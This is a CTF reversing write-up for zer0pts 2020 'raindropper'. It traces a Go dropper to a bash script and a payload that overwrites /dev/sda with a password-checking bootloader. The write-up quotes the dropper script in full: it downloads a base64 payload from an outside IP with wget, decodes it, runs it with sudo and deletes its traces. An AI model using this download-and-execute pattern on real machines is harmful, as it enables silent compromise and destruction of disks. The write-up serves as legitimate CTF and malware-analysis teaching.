HackMD
[zer0pts CTF 2020] raindropper
tags: zer0pts CTF reversing
Overview
We're given a 32-bit ELF.
The binary is made by golang and completely stripped. Analysing this statically is hard, so let's run the binary on VM.
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Nothing happens.
*You have to shut out your network when analysing a real malware!
Analysing "malware"
strace shows you that the binary is using socket. You can either capture the packet or search for IP address from the binary.
$ strings malware | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
...bodyhttp://13.230.161.88:8033/raindropillegal...
http://13.230.161.88:8033/raindrop is suspicious.
You can download the script.
#!/bin/bash
if [ "$(whoami)" != "ImSureItsOnVM" ]; then
echo "****** zer0pts CTF 2020 ******"
echo "* *"
echo "* You're not our target! *"
echo "* *"
echo "******************************"
else
wget -nv -O /tmp/.malchan http://13.230.161.88:8033/malchan 1> /dev/null 2> /dev/null
cat /tmp/.malchan | base64 -d > /tmp/.malchan.bin 2> /dev/null
chmod +x /tmp/.malchan.bin 2> /dev/null
sudo /tmp/.malchan.bin 2> /dev/null
rm -f /tmp/.malchan.bin 2> /dev/null
rm -f /tmp/.malchan 2> /dev/null
rm -f /tmp/.raindrop 2> /dev/null
fi
Let's download malchan too.
Analysing "malchan"
malchan is a very small binary. You can understand what it does by statically analysing it.
It just writes bootloader to /dev/sda only when run as root. You can unpack the bootloader with python script or whatever.
Analysing bootloader
The bootloader asks for user input and checks if it's correct.
check:
xor dx, dx
xor cx, cx
mov si, password
mov di, spaghetti
mov cl, 0x29
.@Loop:
lodsb
add al, dl
ror al, 1
mov dl, al
scasb
jnz .@Error
loop .@Loop
lodsb
scasb
jnz .@Error
xor ax, ax
ret
.@Error:
xor ax, ax
inc al
ret
We can easily decode the encoded flag.
